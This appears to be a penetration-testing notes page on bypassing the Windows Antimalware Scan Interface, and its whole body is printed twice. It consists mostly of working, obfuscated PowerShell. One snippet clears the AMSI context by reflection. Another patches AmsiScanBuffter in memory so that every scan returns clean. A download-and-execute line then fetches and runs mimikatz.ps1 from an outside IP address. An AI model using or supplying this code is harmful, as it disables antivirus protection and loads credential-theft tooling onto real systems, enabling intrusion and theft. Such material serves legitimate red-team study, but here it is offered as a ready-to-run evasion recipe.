Bypassing AMSI

Windows Antimalware Scan Interface (AMSI) allows any program to communicate with the Anti-Virus that communicates on the machine. Essentially a bunch of functions that programs can call (amsi.dll). This allows programs to be like hey amsi scan this file, then amsi will be like or

Its built into PowerShell by default. So even though we're running scripts into memory, it's still getting passed through PowerShell which has AMSI so it stops the process from even happening.

AMSI Scan Buffer

With this technique, when amsi.dll gets loaded into memory we are going to find the location of the amsi scan buffer function and overwrite it in a way that makes it always return a clean file.

Test amsi

Invoke-Expression "AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386"

Clear the amsi context

$a = [Ref].Assembly.GetTypes()
ForEach($b in $a) {if ($b.Name -like "*iUtils") {$c = $b}}
$d = $c.GetFields('NonPublic,Static')
ForEach($e in $d) {if ($e.Name -like "*Context") {$f = $e}}
$g = $f.GetValue($null)
[IntPtr]$ptr = $g
[Int32[]]$buf = @(0)
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)

#Rasta-mouses Amsi-Scan-Buffer patch \n
$vahqn = @"
using System;
using System.Runtime.InteropServices;
public class vahqn {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr kyjgnt, uint flNewProtect, out uint lpflOldProtect);
}
"@

Add-Type $vahqn

$kpvseop = [vahqn]::LoadLibrary("$([CHaR](97+37-37)+[chAr](109*100/100)+[Char]([ByTe]0x73)+[cHAr]([BytE]0x69)+[chAR](46+41-41)+[ChAr](100+67-67)+[CHAr]([ByTE]0x6c)+[ChAr]([byte]0x6c))")
$mgciek = [vahqn]::GetProcAddress($kpvseop, "$([cHaR]([ByTe]0x41)+[ChaR](109)+[ChAR]([BYTE]0x73)+[CHar](105+77-77)+[chAR](83+57-57)+[Char](99*6/6)+[CHar]([BYtE]0x61)+[CHAR](60+50)+[Char](66)+[cHAr]([bYTe]0x75)+[cHar]([BYtE]0x66)+[ChaR](102)+[CHAr]([BYTE]0x65)+[char](114*111/111))")
$p = 0
[vahqn]::VirtualProtect($mgciek, [uint32]5, 0x40, [ref]$p)
$cvgm = "0xB8"
$qqvf = "0x57"
$whib = "0x00"
$mvnn = "0x07"
$djza = "0x80"
$hgrw = "0xC3"
$cxgkz = [Byte[]] ($cvgm,$qqvf,$whib,$mvnn,+$djza,+$hgrw)
[System.Runtime.InteropServices.Marshal]::Copy($cxgkz, 0, $mgciek, 6)

Anything we run that doesn't touch the disk wont be caught by Windows Defender.

Any and all EDR solutions will catch this even if AMSI is bypassed

IEX(New-Object Net.WebClient).downloadString('http://10.9.254.6/mimikatz.ps1')

AMSI.Fail

PreviousAV Evasion NextBypassing UAC

Last updated 1 year ago

Was this helpful?

AMSI Scan Buffer

Test amsi

Invoke-Expression "AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386"

Clear the amsi context

$a = [Ref].Assembly.GetTypes()
ForEach($b in $a) {if ($b.Name -like "*iUtils") {$c = $b}}
$d = $c.GetFields('NonPublic,Static')
ForEach($e in $d) {if ($e.Name -like "*Context") {$f = $e}}
$g = $f.GetValue($null)
[IntPtr]$ptr = $g
[Int32[]]$buf = @(0)
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)

#Rasta-mouses Amsi-Scan-Buffer patch \n
$vahqn = @"
using System;
using System.Runtime.InteropServices;
public class vahqn {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr kyjgnt, uint flNewProtect, out uint lpflOldProtect);
}
"@

Add-Type $vahqn

$kpvseop = [vahqn]::LoadLibrary("$([CHaR](97+37-37)+[chAr](109*100/100)+[Char]([ByTe]0x73)+[cHAr]([BytE]0x69)+[chAR](46+41-41)+[ChAr](100+67-67)+[CHAr]([ByTE]0x6c)+[ChAr]([byte]0x6c))")
$mgciek = [vahqn]::GetProcAddress($kpvseop, "$([cHaR]([ByTe]0x41)+[ChaR](109)+[ChAR]([BYTE]0x73)+[CHar](105+77-77)+[chAR](83+57-57)+[Char](99*6/6)+[CHar]([BYtE]0x61)+[CHAR](60+50)+[Char](66)+[cHAr]([bYTe]0x75)+[cHar]([BYtE]0x66)+[ChaR](102)+[CHAr]([BYTE]0x65)+[char](114*111/111))")
$p = 0
[vahqn]::VirtualProtect($mgciek, [uint32]5, 0x40, [ref]$p)
$cvgm = "0xB8"
$qqvf = "0x57"
$whib = "0x00"
$mvnn = "0x07"
$djza = "0x80"
$hgrw = "0xC3"
$cxgkz = [Byte[]] ($cvgm,$qqvf,$whib,$mvnn,+$djza,+$hgrw)
[System.Runtime.InteropServices.Marshal]::Copy($cxgkz, 0, $mgciek, 6)

Anything we run that doesn't touch the disk wont be caught by Windows Defender.

Any and all EDR solutions will catch this even if AMSI is bypassed

IEX(New-Object Net.WebClient).downloadString('http://10.9.254.6/mimikatz.ps1')